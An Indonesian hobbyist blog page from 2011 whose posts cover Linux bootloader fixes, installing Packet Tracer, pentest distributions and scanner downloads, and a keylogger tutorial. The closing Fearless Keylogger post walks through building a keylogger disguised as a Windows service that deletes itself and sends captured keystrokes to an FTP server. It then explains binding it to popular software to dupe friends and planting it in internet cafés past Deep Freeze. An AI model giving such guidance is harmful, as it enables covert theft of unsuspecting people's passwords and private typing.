    Download BackTrack 5: yg koneksinya agak lemot,ane kasih link download localan aja yak
    Read more

    Recovery Grub Yang Hilang Setelah Install Windows

    ,
    Untuk Yang mash bingung recovery grub pada ubuntu 10.10 setalah install windows, caranya sangat mudah. yang dibutuhkan adalah LiiveCD ubuntu 10.10. langsung saja, booting dari LiveCD. masuk ke terminal login sebagai root :

    $ sudo su

    Cari partisi ubuntu dengan perintah :

    $ fdisk -l

    Disitu akan kelihatan partisinya, contah pada gambar dibawah :
    Pada gambar diatas, partisi linux berada pada /dev/sda1. Buat directory untuk memanipulasi ubuntu anda dengan perintah :

    $ mkdir /media/root

    Langkah selanjutnya, mount /dev/sda1 pada directory /media/root dengan perintah :

    $ mount /dev/sda1 /media/root

    Jika sudah berhasil mount directory tersebut, lalu install grub dengan perintah :

    $ grub-install --root-directory=/media/root /dev/sda

    Jika semua langkah sudah benar, maka tidak ada pesan error dan yag ada pesan "finish and no error report"
    Reboot ubuntu anda, maka secara otomatis grub langsung masuk ke ubuntu an tidak dapat mengakses windows, setelah masuk ke ubuntu. buka terminal dan login sebagai root dan update grub :

    $ sudo su
    $ update-grub

    Sekarang grub pada ubuntu anda sudah seperti semula. selamat mencoba...
    Read more

    Blackbuntu - Penetration Testing Distribution

    ,
    Masih sama dengan gnacktrack yaitu Blackbuntu , ya blackbuntu serupa tapi tak sama dengan gnacktrack menurut saya, mungkin hal ini juga dikarenakan Backtrack 4 sudah based debian jadi semakin banyak distro yang bisa anda pilih, backtrack sendiri masih berbasis KDE untuk desktopnya sehingga banyak bermunculan alternatif distro GNOME, contohnya ya Blackbuntu dan Gnacktrack ini.

    untuk keunggulannya sendiri saya masih belum mencoba blackbuntu tapi sepertinya patut saya coba. daripada anda ribet-ribet instal aplikasi backtrack di ubuntu anda tidak salah juga anda mencoba os yang satu ini..

    silahkan jika anda tertarik untuk menggunakan blackbuntu ini.. karena memang sepertinya patut di coba..

    About Blackbuntu
    Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security.

    Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It’s currently being built using the Ubuntu 10.10 and work on reference Back|Track. It’s created in our own time as a hobby.

    Maintainer Team:
    Project Founder & Main Developer: c1ph3r < c1ph3r {at} blackbuntu . com >
    Developer: x-c0d3 < x-c0d3 {at} blackbuntu . com >
    Developer: mayaseven < mayaseven {at} blackbuntu.com >
    Contributor: salary < salary {at} blackbuntu.com >

    DOWNLOAD BLACKBUNTU :
    http://www.blackbuntu.com/download
    http://sourceforge.net/projects/blackbuntu/
    Read more

    Windows 8

    ,


    Requirements :

    Windows 8 x86 / 32-bit Minimum Requirements:

    1 GHz or faster processor
    1 GB of RAM
    16 GB of available disk space
    DirectX 9 graphics device with Windows Display Driver Model 1.0 or higher driver

    Windows 8 x64 / 64-bit Minimum Requirements :

    1 GHz or faster processor
    2 GB of RAM
    20 GB of available disk space
    DirectX 9 graphics device with Windows Display Driver Model 1.0 or higher driver

    Download :
    Windows 8 Build 7989 x64
    Windows 8 Build 7955 x86
    Read more

    Mari kita lebih peduli pada keamanan komputer

    ,
    Perkembangan komputer sudah sedemikian pesatnya dan sudah banyak dari kita semua yang mulai ketergantungan dengan komputer, selain itu dari sisi perkembangan aplikasi, para developer terlihat banyak yang terus berkompetisi membuat produk yang mudah digunakan dengan fitur yang semakin kompleks. Atas nama waktu dan target maka uji coba program terlihat banyak yang hanya di tes pada fungsinya, keamanan sering menjadi anak tiri.

    Bukan hal yang baru melihat banyaknya web yang di hack, aplikasi yang di temukan celahnya dan sebagainya, seharusnya dalam mengembangkan suatu aplikasi kita perlu melakukan proses test termasuk dari sisi keamanan dan itu perlu berjalan dengan baik, jika tidak maka ancaman terhadap keamanan komputer akan semakin besar seiring semakin kompleksnya pada program.

    Saat ini tutorial hacking begitu mudah diperoleh, baik disitus-situs hacker, juga di berbagai buku hacking. Ditambah software untuk alat hacking semakin mudah digunakan, contohnya menggunakan Fast-Track (Automated Penetration Testing), secara umum ini mengakibatkan individu-individu yang dikenal sebagai hacker menjadi menurun, tapi justru ancaman semakin naik karena orang dapat mudah menjadi penyerang dan hal ini merupakan ancaman bagi kepentingan umum apalagi ditambah makin banyaknya orang awam yang mulai mengenal komputer tanpa mengetahui bagaimana cara mengamankan komputernya sehingga korban dapat semakin banyak.

    Menjadikan Hacking sebagai objek pemikiran maka penulis lebih melihat pada melakukan hacking dengan beretika dan tidak beretika. Untuk yang tidak beretika pengalaman penulis dari jaman dulu sampai saat ini adalah yang paling banyak dilakukan oleh orang ditambah dengan banyak orang yang tidak tahu hingga tidak peduli dengan keamanan komputernya, sehingga sudah bisa ditebak yaitu mereka menjadi target empuk bagi para orang iseng atau orang yang memiliki tujuan khusus.

    Di artikel ini penulis mengajak para pengembang untuk lebih memperhatikan sisi keamanan aplikasi yang dibuatnya yang dimana tindakan test tidak hanya pada fungsi saja tapi juga pada sisi keamanan, juga terhadap pengguna aplikasi yang juga perlu lebih memperhatikan sisi keamanan dalam menggunakan aplikasi, jika misalnya ingin menggunakan CMS dengan component tertentu maka paling tidak aplikasi yang akan digunakan diperiksa keamanannya paling tidak secara umum.

    Oleh Kurniawan


    Article Source
    Read more

    Download XCode Exploit – Vulnurable & webshell Scanner (update Sept2011)

    ,

    XCode Exploit – Vulnurable & webshell Scanner (SQLI/LFI/XSS/Webshell Hunter with Google Engine). Tool ini akan mengumpulkan Link dari Dork yang dimasukkan lalu menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/XSS pada web yang ada di list. Update terbaru telah dirilis dan dapat didownload di sini

    Article Source
    Read more

    Cara memasang BURG di Ubuntu

    ,
    GRUB (Grand Unified Bootloader) itu pintu masuk sistem operasi yang terpasang di komputer atau laptop kita, dialah yang perama kali menyapa kita setelah komputer/laptop dihidupkan, dia pulalah yang memungkinkan kita menggunakan lebih dari satu sistem operasi di harddisk. Sayangnya GRUB itu berpenampilan kurang menarik, dari dulu dia itu identik dengan hitam dan putih, atau warna-warna lain yang sederhana namun. Belakangan dia sudah mulai berdandan, sebelum GRUB versi 2 kita sudah bisa menambahkan latar belakang berosolusi rendah dan tampak sangat jelek. Kemudian ada Gfxboot yang bikin GRUB lebih hidup. Dan yang terakhir di GRUB versi 2, kita sudah bisa mendandaninya menggunakan gambar berformat jpeg atau png beresolusi tinggi.

    Lalu cukupkah sampai di situ? Tentu saja tidak, ada satu proyek yang menyebut dirinya BURG berusaha memberikan make over pada GRUB. Kalau diperhatikan dua nama ini berkebalikan, GRUB jika dibaca dari belakang akan menjadi BURG. Pemilihan nama yang unik, bukan? Salah satu ciri khas yang cukup melekat di komunitas free software. BURG sendiri merupakan kependekan dari “Brand-new Universal loadeR from GRUB”.

    Oke deh, cukup sampai di situ dulu ceritanya karena kita punya pekerjaan yang lain. Apa itu? Tentu saja memasang dan mengatur BURG ini di sistem operasi kesayangan kita, Ubuntu. Langkah-langkahnya adalah sebagai berikut.

    Tambahkan repositori si BURG dari PPA, mengunakan perintah berikut. Ingat! Perintah ini dijalankan dari terminal emulator, gnome terminal kalau menggunakan Gnome atau konsole kalau menggunakan KDE.

    sudo add-apt-repository ppa:bean123ch/burg

    Update daftar index repositori kita dan install BURG dengan mengeksekusi perintah berikut
    1 sudo apt-get update && sudo apt-get install burg burg-themes
    Install BURG ke MBR (Master Boot Record) hard-disk, dengan perintah
    1 sudo burg-install "(hd0)"
    Terakhir, jangan lupa memutakhirkan BURG
    1 sudo update-burg
    Untuk memilih tema, silakan reboot komputer/laptop yang kita gunakan. Tekan tombol t di kibor ketika menu GRUB yang sudah berubah menjadi BURG menyapa kita, pilih salah satu tema yang tersedia. Pratilik tema juga bisa kita intip menggunakan
    1 burg-emu



    article source
    Read more

    Cara Install Packet Tracer di Ubuntu 10.10 Maverick Meerkat

    ,

    Packet Tracer adalah sebuah software yang dikembangkan oleh Cisco. Dimana software tersebut berfungsi untuk membuat suatu jaringan komputer atau sering disebut dengan Computer network.

    Software ini ditujukan untuk pengajaran awal networking sehingga user dapat memahami bagaimana cara kerja suatu networking devices. Bisa dikatakan bahwa packet tracer merupakan program simulasi jaringan, sehingga user dapat membangun jaringan sendiri, mengobservasi “tingkah laku” dari data frame serta paket-paket yang melalui router, switch, dan peralatan lainnya. Tujuan utama kita menggunakan Packet tracer yaitu untuk membantu kita memahami fungsi-fungsi dasar dari berbagai networking devices dan bagaimana peralatan tersebut menghandle frame dan paket-paket.

    Salah satu aspek yang paling berharga dari packet tracer ini adalah kemampuan untuk menjalankan simulasi setelah membangun / mendesain jaringan. Uer dapat membuat sebuah jaringan dan membuat beberapa jaringan yang berbeda skenarionya dalam pengiriman paket dari sumber yang berbeda ke tujuan yang berbeda pula. User-pun dapat menyimpan serta membuka file yang telah dibuatnya itu.

    Network devices yang dapat didukung oleh packet tracer antara lain :



    1. Router


    2. Cloud


    3. Switch


    4. Bridge


    5. Repeater


    6. Hub


    7. Wireless


    8. Access Point


    9. PC


    10. Server

    Interfaces yang dapat didukung oleh packet tracer antara lain:



    1. Ethernet (Copper)


    2. Fast Ethernet ( Copper dan Fiber)


    3. Gigabit Ethernet (Copper dan Fiber)


    4. Serial


    5. Modem


    6. Wireless

    Bandwidth yang dapat didukung oleh packet tracer yaitu :



    1. 56 Kbps


    2. 128 Kbps


    3. 384 Kbps


    4. 786 Kbps


    5. 1.544 Mbps


    6. 2.048 Mbps

    Langsung saja menuju TKP, soalnya sudah membahas panjang lebar mengenai packet Tracer itu sendiri. Untuk memulai, pertama harus punya dulu software packet Tracer tersebut, kalau belum punya silahkan download di sini. Kapasitasnya sekitar 97, 2 Mb. Ketika proses download telah selesai, taruh file hasil download tersebut di desktop. Kemudian bukalah terminal untuk memulai menginstal Packet Tracer. Jika terminal sudah dibuka, login dulu sebagai root, caranya ketikan perintah berikut pada terminal :

    sudo su

    Lalu masuka password ubuntu, setelah itu ganti permission file packet tracer. Caranya ketikan perintah berikut pada terminal :

    chmod 775 PacketTracer53_i386_installer-deb.bin

    Note : saya mengunakan packet Tracer versi 53.

    Setelah itu, ekstrak file tracket tracer tersebut dengan cara ketikan perintah berikut di terminal :

    ./PacketTracer53_i386_installer-deb.bin. Maka akan muncul text seperti berikut:

    Self extracting archive…

    Welcome to Packet Tracer 5.3 Installation

    Read the following End User License Agreement “EULA” carefully. You must accept the terms of this EULA to install and use Packet Tracer 5.3.

    Press the Enter key to read the EULA.


    Tekan ENTER untuk memulai membaca EULA, kemudian akan muncul text seperti berikut:

    Cisco Packet Tracer

    Software License Agreement

    IMPORTANT: PLEASE READ THIS CISCO PACKET TRACER SOFTWARE LICENSE AGREEMENT (THE

    “AGREEMENT”) CAREFULLY. DOWNLOADING, INSTALLING OR USING THE CISCO PACKET

    TRACER SOFTWARE CONSTITUTES ACCEPTANCE OF THIS AGREEMENT. IF YOU DO NOT AGREE

    TO ALL OF THE TERMS OF THIS AGREEMENT, THEN CISCO SYSTEMS, INC. (“CISCO”) IS

    UNWILLING TO LICENSE THE SOFTWARE TO YOU AND YOU ARE NOT AUTHORIZED TO

    DOWNLOAD, INSTALL OR USE THE SOFTWARE.


    Sebenarnya text di atas, masih banyak sambungannya, namun saya copy hanya judulnya saja.

    Setelah itu, tekan SPASI untuk membaca EULA sampai selesai atau 100 % dan kemudian muncul pertanyaan seperti berikut:

    Cisco, Cisco Systems, and the Cisco Systems logo are registered trademarks of

    Cisco Systems, Inc. in the U.S. and certain other countries. Any other

    trademarks mentioned in this document are the property of their respective

    owners.

    Do you accept the terms of this EULA? (Y)es/(N)o


    Tekan Y untuk memulai proses instalasi, tunggu proses instalasi selesai dan akan muncul text seperti berikut :

    You have accepted the terms to the EULA. Congratulations. Packet Tracer will now be installed.

    Attempting to install package now

    Selecting previously deselected package packettracer.

    (Reading database … 224842 files and directories currently installed.)

    Unpacking packettracer (from PacketTracer-5.3-u.i386.deb) …

    Setting up packettracer (5.3) …

    Installed files. Please wait for post-install operations to finish..

    gtk-update-icon-cache: Cache file created successfully.

    Writing PT5HOME environment variable to /etc/profile

    Processing triggers for man-db …

    Processing triggers for gnome-icon-theme …


    Jika proses instalasi diatas telah selesai, masuk saja ke menu Application -> Internet -> Cisco Packet Tracer. Setelah itu maka akan muncul jendela seperti berikut, namun langsung klik yes saja.


    Setelah itu, akan muncul halaman dimana kita akan bekerja.


    article source
    Read more

    INSECT Pro 2.7 - Penetration testing tool

    ,


    INSECT Pro 2.7 - Ultimate is here! This penetration security auditing and testing software solutionis designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications. This is a partial list of the major changes implanted in version 2.7

    - Available targets now has a submenu under right-click button
    - Check update function added in order to verify current version
    - Threading support for GET request
    - Module log added and functional
    - Sniffer support added
    - 50 Remote exploits added
    - Project saved on userland - Application Data special folder
    - Executed module windows added and functionality for it
    - AgentConnect now use telnetlib

    DOWNLOAD INSECT Pro 2.7

    Article Source
    Read more

    Keylogger With FEARLESS KEYLOGGER

    ,
    Pernah dengar keylogger??
    keylogger adalah sejenis program yang mampu menangkap hasil ketikan keyboard user di sebuah computer yang udah ter install ma software ini..
    keylogger bisa dimasukkan dalam kategori virus,Trojan …merupakan salah satu program andalan hacker (umumnya sih yang black hat ) he he he…ada berbagai macam program keylogger contohnya KGB Keylogger,Ardamax Keylogger,Fearless Keylogger..masing2 mempunyai keistimewaan dan kekurangan…tapi disini ane gak mungkin jelasin satu persatu…ane Cuma mau jelasin tentang cara membuat keylogger yang mudah menggunakan fearless keylogger…
    langsung aja oms ..
    Fearless keylogger termasuk program pembuat koetlogger sederhana yang sangat mantabss hasilnya..menurut ane sih.. hi hi hi..bisa didapatkan disini
    Langsung ajah kagak usah banyak cing-cong…jalankan programnya,maka akan muncul tampilan seperti berikut


    Dibagian server name isi aja nama service windows biar menipu,kaya svchost.exe,winlogon.exe,spoolsv.exe atau apalah..(explore u’r brain brother..),dibagian registry key juga sama,trus di kolom “remove” file..di isi tulisan apa aja,ntu gunanya mematikan program keylogger secara otomatis bila di dalam server ftp kita ada file dengan nama yang kita tuliskan di kolom tersebut…< lho kok ada server Ftp segala??hush..diem dulu..ntar ane jelasin >,di bagian victim name diisi nama yang sama dengan nama di kolom “remove:” file; jadi misalkan di kolom “remove” file diisi remove_saya1.me,maka di kolom Victim name di isi saya1....dibagian “Upload dir” diisi directory tempat file log akan dikirim di server ftp kita…
    Trus klik startup options ..maka akan mucul gambar seperti ini

    Centrang aja semua pilihan disana..dan jangan lupa di bagian “melt Server” juga di centang..gunanya menghapus file keylogger setelah dijalankan ma user yang gak paham bahwa menjalankan file keylogger ntu sangat berbahaya..ho ho ho…
    Trus klik logging options


    Nah disini penjelasan kenapa diatas tadi ane sempat nyinggung tentang server ftp…bila belum punya server ftp bisa signup dulu disini kok
    http://www.drivehq.com/secure/FreeSignup.aspx? Gratis..tis..tis
    dah daftar??masukkan alamat ftp tadi di kolom ftp address ,contoh ftp.drivehq.com trus user name kamu dan password kamu…dibagian”when log gets” diisi bytes hasil ketikan yang akan dikirim ke server ftp..Nb:kalau bisa gak usah gede2..misal 100 bytes aja dah cukup lumayan kok,biar cepet dikirimnya…eits gak bingung lebih besar byte atawa kilobytes kan??he he he he.di kolom logfile diisi nama file log yang akan dikirim,misal bila diisi dengan nama warnetA.log..maka di server ftp kita nanti akan ada file dengan nama yang sama…trus klik “Build Server”..jadilah file keylogger kita tadi.. he he he ni contohnya…

    cara pakai??pake trick yang menipu dunk..joinkan dengan sopware yang baru nge trend saat ini dengan program binded.exe,atau file joiner.exe, atau yab file binder.exe..kasih ke temen2 kamu atau upload ke internet biar pada di download…dan hoppla..mereka dapatkan program yang mereka inginkan + KEYLOGGER kamu..wakakakakak atau kalau cara yang licik,pasang di warnet,habisin dulu depfrezze nya,pasang,tutup dan tinggal panen hasil..atau bila warnetnya pake depfrezze terbaru versi 7 dan kita gak punya anti nya dijalankan aja,trus cabut..tunggu sampai ada user yang pake ..meski setelah mereka pakai trus restart kompie,hasil ketikan tetap melayang jauuuhhh ke server kita he he he..
    sekian tutorial dari ane.
    Read more
     

    cvbn45's Blog Copyright © 2011 -- Template created by O Pregador -- Powered by Blogger